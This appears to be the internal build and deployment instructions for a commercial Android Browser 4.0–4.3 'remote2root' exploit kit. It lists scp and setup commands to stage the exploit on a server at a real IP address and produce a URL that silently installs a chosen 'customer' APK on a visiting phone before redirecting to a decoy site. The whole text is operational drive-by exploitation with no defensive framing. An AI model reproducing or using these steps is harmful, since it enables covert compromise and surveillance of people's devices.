----------- [ Android Browser 4.0.x-4.3.x remote2local exploit ] --------------- ------------------------ [ EDN Build instructions ] ---------------------------- The exploit building process will be streamlined with a new GUI in the future, but in the meantime the mobile remote2root exploit can be easily deployed manually. EDN exploit building requires three files: * android43_browser_remote.zip: The actual exploit. * setup.sh: The setup script. * installer.apk: The apk for a specific customer or demo. -- [ Instructions ] 1] Copy the zip package and the setup script to /root/android43_browser_remote, if it's not already there, e.g., $ scp -p -P 30090 android43_browser_remote.zip root@199.175.54.94:/root/android43_browser_remote/ 2] Copy the setup script in the same directory, e.g., $ scp -p -P 30090 setup.sh root@199.175.54.94:/root/android43_browser_remote/ 3] Copy your apk file anywhere on the server (if you want, the exploit directory can be used), e.g. $ scp -p -P 30090 installer.apk root@199.175.54.94:/root/android43_browser_remote/ 4] Login, chdir to /root/android43_browser_remote and run ./setup.sh e.g., # cd /root/android43_browser_remote # ./setup.sh cccccc 199.175.54.94 http://www.google.com ./installer.apk this will create a new exploit instance at http:///docs//fwd which will install the provided apk and redirect to the provided address after exploitation. (http://199.175.54.94/docs/cccccc/fwd in the example) --- [ Building manually using the EDN build script ] 1] Extract the package contents into a temp directory 2] Run the script (./build) like this: ./build Where target_directory is the path where the files need to be stored in the webserver file system and prefix is the URI compnent after the IP address and before the fixed "/fwd" string. As an example, ./build /var/www/files/cccccc 199.175.54.94 docs/cccccc http://www.google.com ./installer.apk will build the exploit in /var/www/files/cccccc which will be accessible as http://199.175.54.94/docs/cccccc/fwd . 3] Set the necessary permissions (all .ini files need to be modified or owned by apache) .